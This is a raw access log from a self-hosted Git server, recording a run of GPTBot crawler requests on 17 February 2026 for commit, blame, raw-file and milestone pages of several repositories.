GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh" -[17/Feb/2026:15:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 9833] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh" -[17/Feb/2026:15:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=furthestduedate&state=open" [Client 74.7.227.38] [Length 8490] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=furthestduedate&state=closed" -[17/Feb/2026:15:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=leastissues&state=open" [Client 74.7.227.38] [Length 8480] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?sort=leastissues&state=closed" -[17/Feb/2026:15:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=leastcomplete&state=open" [Client 74.7.227.38] [Length 8490] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?sort=leastcomplete&state=closed" -[17/Feb/2026:15:42:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/start.sh" -[17/Feb/2026:15:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/start.sh" -[17/Feb/2026:15:42:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/start.sh" -[17/Feb/2026:15:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/start.sh" -[17/Feb/2026:15:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=mostcomplete&state=open" [Client 74.7.227.38] [Length 8496] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?sort=mostcomplete&state=closed" -[17/Feb/2026:15:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=closestduedate&state=open" [Client 74.7.227.38] [Length 8486] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=closestduedate&state=closed" -[17/Feb/2026:15:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13179] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13180] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13180] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:42:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 11709] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:42:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13179] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10564] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2fAssetPilot.pkg" [Client 74.7.227.38] [Length 20817] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg" -[17/Feb/2026:15:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdist%2fGoldMonitor.exe" [Client 74.7.227.38] [Length 20824] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe" -[17/Feb/2026:15:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 1529] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:15:43:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 11632] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" -[17/Feb/2026:15:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12736] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx" -[17/Feb/2026:15:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13700] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:43:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13701] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:43:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10194] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13700] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10897] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15110] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11043] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:43:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11046] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:43:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13716] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:43:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10193] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:43:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13699] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10191] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 9928] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10192] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:43:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9975] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9978] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21633] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13648] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15364] [Gzip 8.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr 